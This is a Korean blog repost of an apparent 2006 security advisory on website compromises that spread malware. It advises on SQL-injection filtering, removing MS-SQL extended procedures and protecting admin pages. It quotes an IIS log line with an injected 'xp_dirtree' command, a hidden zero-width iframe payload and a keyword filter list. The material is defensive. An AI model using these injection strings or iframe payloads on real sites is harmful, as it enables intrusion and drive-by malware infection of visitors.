달력

42024  이전 다음

  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11
  • 12
  • 13
  • 14
  • 15
  • 16
  • 17
  • 18
  • 19
  • 20
  • 21
  • 22
  • 23
  • 24
  • 25
  • 26
  • 27
  • 28
  • 29
  • 30

[펌]웹 해킹을 통한 악성코드 유포사고 주의

JAVA/WAS 2006. 2. 7. 11:18

□ 개요
   o 최근 일반 PC 사용자들이 해킹당한 홈페이지를 방문만 하여도 악성 코드에 감염시키는 웹 해킹 사고가
      지속되고 있어 웹서버 예방 및 대책이 필요합니다.


□ 피해 예방
   o SQL Injection 취약점 제거
     - 사용자 입력값이나 URL 인자값에 특수문자( " / \ ; : Space -- +등)와 SQL 구문(or, and, union,
        select, insert 등)이 포함되어 있는지 검사하여 허용되지 않은 문자열이나 문자가 포함된 경우 차단
     - SQL 서버의 에러 메시지를 사용자에게 보여주지 않도록 설정
       ※ 공격자는 리턴 되는 에러 메시지에 대한 분석을 통하여 공격에 성공할 수 있는 SQL Injection 스트링을
           알아낼 수 있음

   o 불필요한 확장 저장 프로시져 제거
     - MS-SQL 서버에서 제공하고 있는 확장 저장 프로시져 중 사용하지 않는 프로시져들을 제거
     - xp_cmdshell, xp_regread, xp_dirtree와 같은 프로시져들은 공격자에 의해 이용될 수 있으므로 가능한
       제거하는 것이 바람직함

   o 관리자 페이지에 대한 접근 통제
     - 관리자 로그인 페이지 주소를 유추하기 어려운 이름으로 변경하고, 아래와 같은 유추 가능한 이름을 관리자
        페이지로 사용하는 것을 금지
           . http://admin.victim.com
           . http://www.victim.com/admin/
           . http://www.victim.com/manager/
           . http://www.victim.com/master/
           . http://www.victim.com/system/
     - 관리자 PC에서만 홈페이지 관리자 페이지에 접근할 수 있도록 IP별 접근통제 실시 


□ 공격 탐지
   o 주기적인 로그 분석
     - 최근 발생되고 있는 사고는 SQL 공격 흔적이나 공격자의 행위 등이 IIS 웹 로그에 남으므로 로그를
       주기적으로 검사하여 공격자에 의한 침입여부를 확인
     - 공격시 아래와 같은 DB 에러 및 SQL 명령 수행 흔적이 남음
         2005-06-11 17:23:02 xxx.xxx.xxx.xxx - victim_IP 80 GET /announce/new_detail.asp              
         id=529|27|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server] 
         Unclosed_quotation_mark_before_the_character_string_. 500 Mozilla/4.0+ 
         (compatible;+MSIE+6.0;+Windows+NT+5.2;+SV1;+.NET+CLR+1.1.4322)
         2005-06-11 17:23:34 xxx.xxx.xxx.xxx - victim_IP 80 GET /announce/new_detail.asp       
         id=529;DELETE%20bb;Insert%20bb%20exec%20master..xp_dirtree%20C:\,1,1-- 200
         Microsoft+URL+Control+-+6.00.8862

   o 홈페이지 초기화면에 iframe 삽입여부 점검
     - 공격이 성공할 경우 홈페이지 초기 화면에 특정 사이트로 링크되도록 악성코드를 삽입하지만, 공격에
        이용되는 화면의 사이즈를 0과 같이 작게 하여 화면상으로는 확인이 어려움
     - 따라서, 공격 사실을 확인하기 위해서는 다음과 같이 초기화면 소스에 비정상적인 iframe이 삽입되어
        있는지 점검
        iframe src ="http://www.xxx.xx.xx/123/123/index.htm" name ="A" width="0" frameborder="0"

□ 참고 자료
   o 웹 해킹을 통한 악성코드 유포 사이트 사고 사례
      http://www.krcert.or.kr/report/download.jsp?no=IN2005012&seq=0

   o 홈페이지 개발 보안 가이드
      http://www.kisa.or.kr/news/2005/announce_20050427_submit.html

'JAVA > WAS' 카테고리의 다른 글

아파치 튜닝 정리  (0) 2007.01.19
[펌]아파치 + 톰캣 연동  (0) 2006.09.25
Apache 모듈 중 mod_expires -- 이미지 캐시  (0) 2006.02.22
[펌] [weblogic] 웹로직 문제점 방안  (0) 2006.02.07
[펌] Tomcat 클러스터링  (0) 2004.05.19
Posted by tornado
|

티스토리툴바